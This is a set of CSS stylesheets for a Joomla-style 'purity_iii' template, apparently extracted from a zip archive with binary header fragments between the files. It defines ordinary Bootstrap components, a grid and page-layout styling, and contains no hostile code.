  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.popover {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: left;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0px;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  white-space: normal;
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-left: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-left: -10px;
}
.popover-title {
  margin: 0;
  padding: 8px 14px;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1px -1px 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow:after {
  border-width: 10px;
  content: "";
}
.popover.top > .arrow {
  left: 50%;
  margin-left: -11px;
  border-bottom-width: 0;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  bottom: -11px;
}
.popover.top > .arrow:after {
  content: " ";
  bottom: 1px;
  margin-left: -10px;
  border-bottom-width: 0;
  border-top-color: #ffffff;
}
.popover.right > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-left-width: 0;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.popover.right > .arrow:after {
  content: " ";
  left: 1px;
  bottom: -10px;
  border-left-width: 0;
  border-right-color: #ffffff;
}
.popover.bottom > .arrow {
  left: 50%;
  margin-left: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
  top: -11px;
}
.popover.bottom > .arrow:after {
  content: " ";
  top: 1px;
  margin-left: -10px;
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-right-width: 0;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  content: " ";
  right: 1px;
  border-right-width: 0;
  border-left-color: #ffffff;
  bottom: -10px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  overflow: hidden;
  width: 100%;
}
.carousel-inner > .item {
  display: none;
  position: relative;
  -webkit-transition: 0.6s ease-in-out left;
  -o-transition: 0.6s ease-in-out left;
  transition: 0.6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000;
    -moz-perspective: 1000;
    perspective: 1000;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    left: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  left: 100%;
}
.carousel-inner > .prev {
  left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  left: 0;
}
.carousel-inner > .active.left {
  left: -100%;
}
.carousel-inner > .active.right {
  left: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  left: 0;
  bottom: 0;
  width: 15%;
  opacity: 0.5;
  filter: alpha(opacity=50);
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
}
.carousel-control.right {
  left: auto;
  right: 0;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
}
.carousel-control:hover,
.carousel-control:focus {
  outline: 0;
  color: #ffffff;
  text-decoration: none;
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  margin-top: -10px;
  line-height: 1;
  font-family: serif;
}
.carousel-control .icon-prev:before {
  content: '\2039';
}
.carousel-control .icon-next:before {
  content: '\203a';
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  left: 50%;
  z-index: 15;
  width: 60%;
  margin-left: -30%;
  padding-left: 0;
  list-style: none;
  text-align: center;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  border: 1px solid #ffffff;
  border-radius: 10px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
}
.carousel-indicators .active {
  margin: 0;
  width: 12px;
  height: 12px;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  left: 15%;
  right: 15%;
  bottom: 20px;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -15px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-left: -15px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-right: -15px;
  }
  .carousel-caption {
    left: 20%;
    right: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-footer:before,
.modal-footer:after {
  content: " ";
  display: table;
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
.pull-right {
  float: right !important;
}
.pull-left {
  float: left !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKԜ�\a\��	�	0purity_iii/local/css/themes/gris/legacy-grid.cssnu&1i�.row-fluid {
  margin-left: -15px;
  margin-right: -15px;
}
[class*="span"] {
  float: left;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-left: 100%;
}
.offset11 {
  margin-left: 91.66666667%;
}
.offset10 {
  margin-left: 83.33333333%;
}
.offset9 {
  margin-left: 75%;
}
.offset8 {
  margin-left: 66.66666667%;
}
.offset7 {
  margin-left: 58.33333333%;
}
.offset6 {
  margin-left: 50%;
}
.offset5 {
  margin-left: 41.66666667%;
}
.offset4 {
  margin-left: 33.33333333%;
}
.offset3 {
  margin-left: 25%;
}
.offset2 {
  margin-left: 16.66666667%;
}
.offset1 {
  margin-left: 8.33333333%;
}
.offset0 {
  margin-left: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKԜ�\�d/�VV6purity_iii/local/css/themes/gris/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}PKԜ�\�d/�VV5purity_iii/local/css/themes/red/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}PKԜ�\�Cd���4purity_iii/local/css/themes/red/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  content: " ";
  display: table;
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
  top: -1px;
  left: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #cc0000;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-right: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKԜ�\:purity_iii/local/css/themes/red/layouts/features-intro.cssnu&1i�PKԜ�\�.��5purity_iii/local/css/themes/red/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKԜ�\LMN��0purity_iii/local/css/themes/red/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #cc0000;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKԜ�\�XJ*((0purity_iii/local/css/themes/red/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-right: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #800000;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKԜ�\ͦ�!!4purity_iii/local/css/themes/red/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #cc0000;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../../../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  right: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKԜ�\@b-��[�[-purity_iii/local/css/themes/red/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: 1px dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  -moz-box-sizing: content-box;
  -webkit-box-sizing: content-box;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    background: transparent !important;
    color: #000 !important;
    box-shadow: none !important;
    text-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  select {
    background: #fff !important;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #cc0000;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #800000;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
